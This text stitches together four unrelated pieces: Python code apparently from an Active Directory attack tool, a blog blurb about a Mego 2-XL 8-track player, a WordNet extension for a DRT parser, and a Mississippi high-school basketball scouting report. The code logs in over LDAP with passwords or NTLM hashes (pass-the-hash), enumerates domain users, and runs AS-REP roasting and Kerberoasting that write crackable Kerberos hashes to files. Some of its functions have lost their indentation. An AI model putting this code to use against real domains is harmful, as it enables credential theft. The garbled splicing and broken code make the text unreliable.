    # Remove last ','
    self.baseDN = self.baseDN[:-1]

    if self.kdcHost is not None:
        target = self.kdcHost
    else:
        target = domain

    if self.password == '' and self.args.asreproast:
        # No password supplied: try to AS-REP roast the account instead.
        hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
        if hash_TGT:
            self.logger.highlight(u'{}'.format(hash_TGT))
            with open(self.args.asreproast, 'a+') as hash_asreproast:
                hash_asreproast.write(hash_TGT + '\n')
        return False

    # BUG FIX: build 'out' before the try block. It was previously assigned
    # only after a successful plain-LDAP bind, so the LDAPS retry path raised
    # a NameError when referencing it.
    out = u'{}{}:{} {}'.format('{}\\'.format(domain),
                               username,
                               password,
                               highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
    try:
        # Connect to LDAP
        self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
        self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
        #self.check_if_admin()
        self.logger.success(out)
        if not self.args.continue_on_success:
            return True
    except ldap_impacket.LDAPSessionError as e:
        if str(e).find('strongerAuthRequired') >= 0:
            # We need to try SSL
            try:
                self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
                self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
                self.logger.success(out)
            except ldap_impacket.LDAPSessionError as e:
                # '\\' (was the invalid escape '\{'); rendered text unchanged.
                self.logger.error(u'{}\\{}:{}'.format(self.domain,
                                                      self.username,
                                                      self.password))
        else:
            self.logger.error(u'{}\\{}:{}'.format(self.domain,
                                                  self.username,
                                                  self.password))
        return False
    except OSError as e:
        self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
                                                 self.username,
                                                 self.password,
                                                 "Error connecting to the domain, please add option --kdcHost with the IP of the domain controller"))
        return False
def hash_login(self, domain, username, ntlm_hash):
    """Authenticate to LDAP with an NTLM hash (pass-the-hash).

    Parameters
    ----------
    ntlm_hash : str
        Either "LMHASH:NTHASH" or just the NT hash.

    Returns
    -------
    bool or None
        True on success (None when --continue-on-success), False on failure.
    """
    lmhash = ''
    nthash = ''

    # Split off the LM half if the caller provided "LM:NT".
    if ntlm_hash.find(':') != -1:
        lmhash, nthash = ntlm_hash.split(':')
    else:
        nthash = ntlm_hash

    self.hash = ntlm_hash
    if lmhash: self.lmhash = lmhash
    if nthash: self.nthash = nthash

    self.username = username
    self.domain = domain

    # Build the search base from the domain name (foo.bar -> dc=foo,dc=bar).
    self.baseDN = ''
    domainParts = self.domain.split('.')
    for i in domainParts:
        self.baseDN += 'dc=%s,' % i
    # Remove last ','
    self.baseDN = self.baseDN[:-1]

    if self.kdcHost is not None:
        target = self.kdcHost
    else:
        target = domain

    if self.hash == '' and self.args.asreproast:
        hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
        if hash_TGT:
            self.logger.highlight(u'{}'.format(hash_TGT))
            with open(self.args.asreproast, 'a+') as hash_asreproast:
                hash_asreproast.write(hash_TGT + '\n')
        return False

    # Connect to LDAP
    out = u'{}{}:{}'.format('{}\\'.format(domain),
                            username,
                            nthash)
    try:
        self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
        # NOTE(review): self.password is never assigned in this method -- the
        # bind relies on the NTLM hashes (plus whatever self.password holds
        # from the base connection); confirm against cme.connection.
        self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
        #self.check_if_admin()
        self.logger.success(out)
        if not self.args.continue_on_success:
            return True
    except ldap_impacket.LDAPSessionError as e:
        if str(e).find('strongerAuthRequired') >= 0:
            try:
                # We need to try SSL
                self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
                self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
                self.logger.success(out)
            except ldap_impacket.LDAPSessionError as e:
                # '\\' (was the invalid escape '\{'); rendered text unchanged.
                self.logger.error(u'{}\\{}:{}'.format(self.domain,
                                                      self.username,
                                                      self.nthash))
        else:
            self.logger.error(u'{}\\{}:{}'.format(self.domain,
                                                  self.username,
                                                  self.nthash))
        return False
    except OSError as e:
        self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
                                                 self.username,
                                                 self.nthash,
                                                 "Error connecting to the domain, please add option --kdcHost with the IP of the domain controller"))
        return False
def create_smbv1_conn(self):
    """Try to open an SMBv1 session to the target; return True on success."""
    try:
        self.conn = SMBConnection(self.host, self.host, None, 445,
                                  preferredDialect=SMB_DIALECT)
    except socket.error as e:
        if 'Connection reset by peer' in str(e):
            logging.debug('SMBv1 might be disabled on {}'.format(self.host))
        return False
    except Exception as e:
        logging.debug('Error creating SMBv1 connection to {}: {}'.format(self.host, e))
        return False
    self.smbv1 = True
    return True
def create_smbv3_conn(self):
    """Try to open an SMBv2/v3 session to the target; return True on success."""
    try:
        self.conn = SMBConnection(self.host, self.host, None, 445)
    except socket.error:
        return False
    except Exception as e:
        logging.debug('Error creating SMBv3 connection to {}: {}'.format(self.host, e))
        return False
    self.smbv1 = False
    return True
def create_conn_obj(self):
    """Open an SMB connection, preferring SMBv1 and falling back to SMBv2/v3."""
    return self.create_smbv1_conn() or self.create_smbv3_conn()
def getUnixTime(self, t):
    """Convert a Windows FILETIME value (100 ns ticks since 1601-01-01)
    to a Unix epoch timestamp in seconds."""
    return (t - 116444736000000000) / 10000000
def search(self, searchFilter, attributes, sizeLimit=999):
    """Run an LDAP search, tolerating server-side size limits.

    Returns the result set, the partial answers on sizeLimitExceeded,
    or False on any other LDAP search error.
    """
    logging.debug('Search Filter=%s' % searchFilter)
    try:
        return self.ldapConnection.search(searchFilter=searchFilter,
                                          attributes=attributes,
                                          sizeLimit=sizeLimit)
    except ldap_impacket.LDAPSearchError as e:
        if e.getErrorString().find('sizeLimitExceeded') >= 0:
            logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
            # We hit the server-side limit: keep whatever was returned
            # until paged queries are implemented.
            return e.getAnswers()
        logging.debug(e)
        return False
def users(self):
    """Enumerate domain user accounts (sAMAccountType=805306368) over LDAP.

    Logs one line per user: account name, bad-password count and the time
    of the last bad password attempt.
    """
    # Building the search filter
    searchFilter = "(sAMAccountType=805306368)"
    attributes = []
    resp = self.search(searchFilter, attributes, 999)
    if resp is False:
        # search() already logged the LDAP error; len(False) would raise.
        return
    answers = []
    logging.debug('Total of records returned %d' % len(resp))
    for item in resp:
        if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
            continue
        mustCommit = False
        sAMAccountName = ''
        badPasswordTime = ''
        # BUG FIX: keep the hex-string form so the int(value, 16) below never
        # receives a plain int when the attribute is absent.
        badPwdCount = '0x0'
        try:
            for attribute in item['attributes']:
                if str(attribute['type']) == 'sAMAccountName':
                    sAMAccountName = str(attribute['vals'][0])
                    mustCommit = True
                elif str(attribute['type']) == 'badPwdCount':
                    badPwdCount = "0x%x" % int(attribute['vals'][0])
                elif str(attribute['type']) == 'badPasswordTime':
                    if str(attribute['vals'][0]) == '0':
                        badPasswordTime = '<never>'
                    else:
                        badPasswordTime = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
            if mustCommit is True:
                answers.append([sAMAccountName, badPwdCount, badPasswordTime])
        except Exception as e:
            logging.debug("Exception:", exc_info=True)
            logging.debug('Skipping item, cannot process due to error %s' % str(e))
            pass
    if len(answers) > 0:
        logging.debug(answers)
        for value in answers:
            # Label fix: the third column is badPasswordTime, not pwdLastSet.
            self.logger.highlight('{:<30} badpwdcount: {} badpwdtime: {}'.format(value[0], int(value[1], 16), value[2]))
    else:
        self.logger.error("No entries found!")
    return
def groups(self):
# Building the search filter
searchFilter = "(objectCategory=group)"
attributes=[]
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
name = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'name':
name = str(attribute['vals'][0])
mustCommit = True
# if str(attribute['type']) == 'objectSid':
# print(format_sid((attribute['vals'][0])))
if mustCommit is True:
answers.append([name])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight('{}'.format(value[0]))
else:
self.logger.error("No entries found!")
return
    def asreproast(self):
        """AS-REP roast: find accounts with Kerberos pre-authentication
        disabled and dump their AS-REP hashes for offline cracking.

        Hashes are printed and appended to the file named by
        self.args.asreproast.  Returns True when at least one hash was
        obtained, False when no credentials are available for the bind.
        """
        # Without a password, NT hash or Kerberos auth we cannot bind.
        if self.password == '' and self.nthash == '' and self.kerberos == False:
            return False
        # Building the search filter: pre-auth not required, account not
        # disabled, and not a computer object.
        searchFilter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" \
                       "(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % \
                       (UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)
        attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
        resp = self.search(searchFilter, attributes, 999)
        answers = []
        # NOTE(review): search() can return False on error, in which case
        # len(resp) below raises TypeError -- confirm intended handling.
        logging.debug('Total of records returned %d' % len(resp))
        for item in resp:
            # Skip referrals / anything that is not an actual entry.
            if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
                continue
            mustCommit = False
            sAMAccountName = ''
            memberOf = ''
            pwdLastSet = ''
            userAccountControl = 0
            lastLogon = 'N/A'
            try:
                for attribute in item['attributes']:
                    if str(attribute['type']) == 'sAMAccountName':
                        sAMAccountName = str(attribute['vals'][0])
                        mustCommit = True
                    elif str(attribute['type']) == 'userAccountControl':
                        userAccountControl = "0x%x" % int(attribute['vals'][0])
                    elif str(attribute['type']) == 'memberOf':
                        # Only the first group value is recorded.
                        memberOf = str(attribute['vals'][0])
                    elif str(attribute['type']) == 'pwdLastSet':
                        # '0' encodes "never set" in AD FILETIME attributes.
                        if str(attribute['vals'][0]) == '0':
                            pwdLastSet = '<never>'
                        else:
                            pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                    elif str(attribute['type']) == 'lastLogon':
                        if str(attribute['vals'][0]) == '0':
                            lastLogon = '<never>'
                        else:
                            lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                if mustCommit is True:
                    answers.append([sAMAccountName, memberOf, pwdLastSet, lastLogon, userAccountControl])
            except Exception as e:
                logging.debug("Exception:", exc_info=True)
                logging.debug('Skipping item, cannot process due to error %s' % str(e))
                pass
        if len(answers) > 0:
            for user in answers:
                # Request an AS-REP for each user and emit the crackable hash.
                hash_TGT = KerberosAttacks(self).getTGT_asroast(user[0])
                self.logger.highlight(u'{}'.format(hash_TGT))
                with open(self.args.asreproast, 'a+') as hash_asreproast:
                    hash_asreproast.write(hash_TGT + '\n')
            return True
        else:
            self.logger.error("No entries found!")
    def kerberoasting(self):
        """Kerberoast: collect TGS hashes for every enabled, non-computer
        account that has at least one servicePrincipalName.

        Each hash is printed and appended to self.args.kerberoasting.
        """
        # Building the search filter: has an SPN, NORMAL_ACCOUNT (512) bit
        # set, ACCOUNTDISABLE (2) bit clear, and not a computer object.
        searchFilter = "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)" \
                       "(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))"
        attributes = ['servicePrincipalName', 'sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
        resp = self.search(searchFilter, attributes, 999)
        answers = []
        # NOTE(review): search() can return False on error, in which case
        # len(resp) below raises TypeError -- confirm intended handling.
        logging.debug('Total of records returned %d' % len(resp))
        for item in resp:
            # Skip referrals / anything that is not an actual entry.
            if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
                continue
            mustCommit = False
            sAMAccountName = ''
            memberOf = ''
            SPNs = []
            pwdLastSet = ''
            userAccountControl = 0
            lastLogon = 'N/A'
            delegation = ''
            try:
                for attribute in item['attributes']:
                    if str(attribute['type']) == 'sAMAccountName':
                        sAMAccountName = str(attribute['vals'][0])
                        mustCommit = True
                    elif str(attribute['type']) == 'userAccountControl':
                        userAccountControl = str(attribute['vals'][0])
                        # Classify the delegation type from the UAC bits.
                        if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:
                            delegation = 'unconstrained'
                        elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:
                            delegation = 'constrained'
                    elif str(attribute['type']) == 'memberOf':
                        # Only the first group value is recorded.
                        memberOf = str(attribute['vals'][0])
                    elif str(attribute['type']) == 'pwdLastSet':
                        # '0' encodes "never set" in AD FILETIME attributes.
                        if str(attribute['vals'][0]) == '0':
                            pwdLastSet = '<never>'
                        else:
                            pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                    elif str(attribute['type']) == 'lastLogon':
                        if str(attribute['vals'][0]) == '0':
                            lastLogon = '<never>'
                        else:
                            lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                    elif str(attribute['type']) == 'servicePrincipalName':
                        # An account may expose several SPNs.
                        for spn in attribute['vals']:
                            SPNs.append(str(spn))
                if mustCommit is True:
                    if int(userAccountControl) & UF_ACCOUNTDISABLE:
                        # Defensive double-check; the LDAP filter should
                        # already exclude disabled accounts.
                        logging.debug('Bypassing disabled account %s ' % sAMAccountName)
                    else:
                        # One answer row per SPN of the account.
                        for spn in SPNs:
                            answers.append([spn, sAMAccountName, memberOf, pwdLastSet, lastLogon, delegation])
            except Exception as e:
                logging.error('Skipping item, cannot process due to error %s' % str(e))
                pass
        if len(answers) > 0:
            #users = dict( (vals[1], vals[0]) for vals in answers)
            # One TGT is enough; each SPN then gets its own TGS request.
            TGT = KerberosAttacks(self).getTGT_kerberoasting()
            for SPN, sAMAccountName, memberOf, pwdLastSet, lastLogon, delegation in answers:
                try:
                    serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
                    tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.domain,
                                                                            self.kdcHost,
                                                                            TGT['KDC_REP'], TGT['cipher'],
                                                                            TGT['sessionKey'])
                    # Format the TGS into a crackable hash line.
                    r = KerberosAttacks(self).outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName, SPN)
                    self.logger.highlight(u'sAMAccountName: {} memberOf: {} pwdLastSet: {} lastLogon:{}'.format(sAMAccountName, memberOf, pwdLastSet, lastLogon))
                    self.logger.highlight(u'{}'.format(r))
                    with open(self.args.kerberoasting, 'a+') as hash_kerberoasting:
                        hash_kerberoasting.write(r + '\n')
                except Exception as e:
                    logging.debug("Exception:", exc_info=True)
                    logging.error('SPN: %s - %s' % (SPN,str(e)))
        else:
            self.logger.error("No entries found!")
def trusted_for_delegation(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight(value[0])
else:
self.logger.error("No entries found!")
return
def password_not_required(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=32)"
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
attributes=['sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=999)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
return False
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
status = 'enabled'
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
if int(attribute['vals'][0]) & 2 :
status = 'disabled'
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName, memberOf, pwdLastSet, lastLogon, userAccountControl, status])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight("User: " + value[0] + " Status: " + value[5])
else:
self.logger.error("No entries found!")
return
def admin_count(self):
# Building the search filter
searchFilter = "(adminCount=1)"
attributes=['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight(value[0])
else:
self.logger.error("No entries found!")
return
|
Here's a lovely little gem from 1978, the Mego "2-XL" 8 Track tape player, which looks like a delightfully awesome robot. I really wish that I had been old enough to get into this branch of consumer electronics, especially when they looked like this and were made by the legendary Mego folks. I was 2, just about, when this was on the market, so I guess that was a little early to pick up some Judas Priest on the 8 track deck. Ah well, I could always make up for lost time and add this little pal to the collection, or you could instead!
|
"""
Extension of temporaldrt using WordNet ontology
"""
__author__ = " Emma Li, Peter Makarov, Alex Kislev"
__version__ = "1.0"
__date__ = "Tue, 24 Aug 2010"
import nltk
from nltk.corpus.reader.wordnet import WordNetCorpusReader
import temporaldrt as drt
from temporaldrt import DrtTokens, DrtFeatureConstantExpression
def singleton(cls):
    """Class decorator: replace *cls* with a zero-argument factory that
    lazily creates one shared instance and returns it on every call."""
    instances = []

    def get_instance():
        # Instantiate on first use only; afterwards reuse the cached object.
        if not instances:
            instances.append(cls())
        return instances[0]

    return get_instance
@singleton
class WordNetLookup(object):
    """Lazy singleton wrapper around NLTK's WordNet corpus reader,
    providing the hypernymy / part-of-speech tests used by the DRS
    resolution code."""
    def __init__(self, path='corpora/wordnet'):
        self.path = path  # nltk.data path to the WordNet corpus
        self.WN = None    # corpus reader; created lazily by wn()
    def wn(self):
        # Load the corpus reader on first use; later calls are no-ops.
        if not self.WN:
            self.WN = WordNetCorpusReader(nltk.data.find(self.path))
    def is_superclass_of(self, first, second):
        "Is the second noun the superclass of the first one?"
        self.wn()
        # Words absent from WordNet raise inside _num_of_senses; treat any
        # failure as "not a superclass".
        try:
            num_of_senses_first = self._num_of_senses(first)
            num_of_senses_second = self._num_of_senses(second)
        except: return False
        # Compare every sense of 'second' against every sense of 'first'.
        for n in range(num_of_senses_second):
            synset_second = self._noun_synset(second, ind=n)
            for i in range(num_of_senses_first):
                if synset_second in self._noun_synset(first, i).common_hypernyms(synset_second):
                    return True
        return False
    def is_adjective(self, word):
        # A word counts as an adjective if it has at least one 'a' sense.
        try:
            self._num_of_senses(word, 'a')
            return True
        except: return False
    def _noun_synset(self, noun, ind):
        # NOTE(review): 'ind' arrives 0-based and unpadded ("dog.n.0"),
        # while WordNet sense names are conventionally 1-based ("dog.n.01")
        # -- confirm the reader accepts this indexing.
        self.wn()
        return self.WN.synset("%s.n.%s" % (noun, ind))
    def _num_of_senses (self, word, pos='n'):
        # Raises KeyError for words absent from WordNet (callers rely on it).
        self.wn()
        return len(self.WN._lemma_pos_offset_map[word][pos])
    def is_person(self, word):
        return self.is_superclass_of(word, 'person')
    def is_animal(self, word):
        return self.is_superclass_of(word, 'animal')
class DefiniteDescriptionDRS(drt.DefiniteDescriptionDRS):
    """Definite-description presupposition DRS whose antecedent matching is
    backed by WordNet (hypernymy and person/animal tests)."""
    def __init__(self, refs, conds):
        self.wn = WordNetLookup()  # shared singleton WordNet helper
        # NOTE(review): super() is passed the *parent* class, so this skips
        # drt.DefiniteDescriptionDRS.__init__ and invokes the grandparent's
        # __init__ instead -- confirm this is intentional.
        super(drt.DefiniteDescriptionDRS, self).__init__(refs, conds)
    def _strict_check (self, presupp_noun, other_cond):
        # Strict match: identical noun, or the candidate noun is a WordNet
        # superclass of the presupposed one, or the candidate is a proper
        # name while the presupposed noun denotes a person/animal.
        other_noun = other_cond.function.variable.name
        return (
            presupp_noun == other_noun or
            self.wn.is_superclass_of(other_noun, presupp_noun) or
            (other_cond.is_propername() and (self.wn.is_person(presupp_noun) or self.wn.is_animal(presupp_noun)))
        )
    def _non_strict_check(self, presupp_noun, other_cond):
        # Relaxed match: strict check first, then also accept when both
        # nouns denote people, or when the presupposed noun subsumes the
        # candidate (e.g. 'cat' resolving to 'kitty').
        strict_check = self._strict_check(presupp_noun, other_cond)
        if strict_check: return True
        # If the strict check fails, check if both are people
        other_noun = other_cond.function.variable.name
        return (
            (self.wn.is_person(presupp_noun) and self.wn.is_person(other_noun))
            or self.wn.is_superclass_of(presupp_noun, other_noun)) # cat, kitty
    def semantic_check(self, individuals, presupp_individuals, strict=False):
        """Return True if some candidate antecedent in *individuals* is
        semantically compatible with this presupposition (strict or
        relaxed matching per the *strict* flag)."""
        check = {True : self._strict_check,
                 False: self._non_strict_check}[strict]
        # Strict check - passes if features match and 1) string matching 2) hyponym-hypernym relation, and
        # 3) self.funcname is a person or animal and the antecedent is a proper name
        # Non-strict check: both are people and features match
        if isinstance(self.cond, DrtFeatureConstantExpression):
            for individual in individuals:
                if isinstance(individual, DrtFeatureConstantExpression) and check(self.function_name, individual):
                    return True
            return False
        else:
            # If no features are used, we cannot guarantee that the condition we got self.function_name from wasn't an adjective.
            # Likewise, individuals contains not only nouns but also adjectives, and we don't know which are which
            found_noun = False # We should find at least one noun
            for presupp_individual in presupp_individuals[self.variable]:
                presupp_noun = presupp_individual.function.variable.name
                if not self.wn.is_adjective(presupp_noun):
                    found_noun = True
                    break
            # If we found no noun (that is not also an adjective), ignore the 'is adjective' check for presupposition individuals
            # (in that case, we had probably better ignore this check for 'individuals', too)
            for individual in individuals:
                other_noun = individual.function.variable.name
                if found_noun and self.wn.is_adjective(other_noun): continue
                for presupp_individual in presupp_individuals[self.variable]:
                    presupp_noun = presupp_individual.function.variable.name
                    if found_noun and self.wn.is_adjective(presupp_noun): continue
                    if check (presupp_noun, individual):
                        return True
            return False
class DrtParser(drt.DrtParser):
    """DRT parser that builds WordNet-aware DefiniteDescriptionDRS nodes."""

    def handle_PresuppositionDRS(self, tok, context):
        # Intercept only definite-description DRSs; delegate everything
        # else to the base parser.
        if tok != DrtTokens.DEFINITE_DESCRIPTION_DRS:
            return drt.DrtParser.handle_PresuppositionDRS(self, tok, context)
        self.assertNextToken(DrtTokens.OPEN)
        parsed = self.handle_DRS(tok, context)
        return DefiniteDescriptionDRS(parsed.refs, parsed.conds)
|
This report includes notes from November 20-26. Included in this will be the Inaugural River City Challenge from Warren Central HS, Leake County Shootout from Leake County HS and the 8th Annual MS Hoops Challenge Thanksgiving Showcase from Forest Hill HS.
Tommy Washington 6-3 170 lbs F Yazoo City HS (Yazoo City): 18 pts (15 in 2nd half) vs Brandon. He played hard and it showed in his production. He made the best of his scoring opportunities. Post grads might want to take a look at him.
Walter White 6-7 C Brandon HS (Brandon): 2 pts, 7 reb, 3 blk vs Yazoo City. He has the look of a player. Long, strong and athletic. He rebounds and protects the rim. He will be a good fit for a post grad program needing length and size.
Kevin Taylor 6-5 F Brandon HS (Brandon): 14 pts, 10 reb, 5 ast, 3 st vs Yazoo City. A great stat line and he did it very quietly. He is lanky and athletic. He needs to be checked out by post grads and JUCO’s this season.
Dewayne Stewart Jr 6-6 190 lbs G Riverside HS (Grace) (Mississippi State) 3.0 GPA 18 ACT: 19 pts, 7-10 fg, 2 3’s, 10 reb, 3 ast vs Wingfield. DJ, why you do that man like that? DJ had several high flying dunks on his way to his 19 points. The best play of the day might’ve been a missed dunk by DJ. The look on the defenders face when DJ went up on him was priceless. He is a must see player this year for any basketball fan.
Chavis Smith 5-10 159 lbs G Warren Central HS (Vicksburg) 3.0 GPA: 18 pts, 5 reb vs Pearl. Great defending guard. He plays with full effort. He can create contact around the basket and score after the contact. Post grads need to check him out this year.
Chris Early C Warren Central HS (Vicksburg): 11 pts vs Pearl. A good size presence down low on the defensive end. He’s strong and contested shots all night. He scores when he has the opportunity on the offensive end. Another good player for post grads to check out.
Brandon Payne 6-0 165 lbs G Newton HS (Newton) 3.0 GPA: 25 pts, 5 3’s, 2-2 ft, 3 reb, 2 st, 1 charge taken vs Morton. Good shooter from outside and all-around scorer. He showed high energy on both ends. He needs to be seen this season by JUCO Coaches.
Austin Sigsworth 6-4 180 lbs G/F Bay Springs HS (Bay Springs): 10 pts, 3 reb, 1 charge taken vs Forest. Here’s an update from the Magnolia Hoops Senior Showcase. Austin did not play that well as reported from the Showcase. Update, he can play. He showed he can play multiple positions. He has some handles, he rebounded and he showed he can score. He’s a shooter and he can also get into the lane and score on pull up jumpers. He can definitely play on the next level and needs to be checked out by JUCO’s.
Michael Barber 6-8 220 lbs G/F Jackson Academy HS (Jackson) 3.03 GPA 20 ACT: 19 pts, 12 reb, 2 st, 5 blk vs Laurel. That was the best performance I’ve seen from him in several years. He lived up to the Dandy Dozen potential on both ends of the court. He scored 19 (I think they were off because I had him with 20 at the half myself). He handled the ball very well. He rebounded hard on both ends and played defense with some energy. He contested shots and created havoc down low. He displayed skills of a D1 guy today.
Bryson Mills 6-4 G Mendenhall HS (Mendenhall): 15 pts, 12 reb, 2 3’s vs Lanier. Bryson is back from his injury. He has his hops back and his lateral movement. He crashed the boards hard on the offensive end. He should be a high priority for every JUCO around.
Miles Miller 6-3 160 lbs PG Meridian HS (Meridian) 3.9 GPA 28 ACT: 25 pts, 6 3’s, 7-8 ft vs Callaway. D1’s, what in the world are you waiting on? Coach Norman should get tired of schools calling to check on him. High, high academic player. He can shoot. He can handle and distribute. He plays some sneaky good defense. He is equally as smart on the court as he is in the classroom. Big time players show up in big time games and it didn’t get much bigger than that one.
Tyron “Ty” Brewer 6-7 185 lbs F Meridian HS (Brookville) 3.3 GPA 17 ACT: 20 pts, 4-5 ft, 9 reb vs Callaway. Ty had a good game on both ends of the court. He scored and snagged offensive boards. He was everywhere defensively. The low to mid major is set to have a good season.
Damian “Diggy” Dear 6-2 180 lbs PG Murrah HS (Jackson): 18 pts, 3-4 ft vs Raymond. Diggy had a good game scoring on multiple levels. He handled the ball with confidence. He played hard on-ball defense. He is a steal for JUCO’s.
